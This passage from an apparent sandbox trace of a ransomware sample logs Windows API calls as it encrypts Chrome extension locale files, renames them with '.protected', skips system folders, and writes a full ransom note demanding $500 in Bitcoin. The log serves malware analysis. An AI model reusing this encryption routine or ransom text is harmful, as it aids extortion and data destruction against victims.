lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0079.842] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.843] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.843] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 164 [0079.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.843] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.843] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.844] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.844] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.844] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.844] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.844] CloseHandle (hObject=0x164) returned 1 [0079.844] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0079.844] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0079.844] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT") returned 146 [0079.845] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0079.845] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0079.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*") returned 148 [0079.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.845] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.845] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.845] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.845] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.845] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\.") returned 148 [0079.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.845] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.845] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.845] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.845] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.845] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\..") returned 149 [0079.845] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.845] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.846] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.846] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.846] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.846] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.846] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0079.846] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.846] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.847] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.847] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.848] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.848] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.848] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.848] CloseHandle (hObject=0x168) returned 1 [0079.848] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.protected") returned 170 [0079.848] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0079.849] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.849] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.849] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 164 [0079.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.849] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.849] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.850] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.850] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.850] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.850] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.850] CloseHandle (hObject=0x164) returned 1 [0079.850] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.850] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0079.850] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0079.851] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0079.851] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0079.851] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0079.851] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro") returned 143 [0079.851] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0079.851] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0079.851] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*") returned 145 [0079.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.852] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.852] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.852] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.852] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.852] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\.") returned 145 [0079.852] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.852] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.852] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.852] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.852] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.852] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.852] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\..") returned 146 [0079.852] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.852] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.852] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.852] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.852] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.852] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.852] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.853] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.853] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.853] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.853] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.854] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.854] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.854] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.854] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.854] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.854] CloseHandle (hObject=0x168) returned 1 [0079.855] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.protected") returned 167 [0079.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 